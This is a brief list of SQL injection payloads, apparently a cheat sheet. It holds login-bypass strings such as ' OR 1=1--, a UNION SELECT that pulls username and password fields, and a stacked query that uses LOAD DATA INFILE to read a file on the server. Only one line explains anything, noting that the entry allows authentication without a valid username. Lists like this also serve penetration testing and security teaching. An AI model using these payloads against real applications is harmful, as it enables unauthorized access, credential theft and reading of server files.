<username>' OR 1=1--
'OR '' = '	Allows authentication without a valid username.
<username>'--
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
'OR 1=1--
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;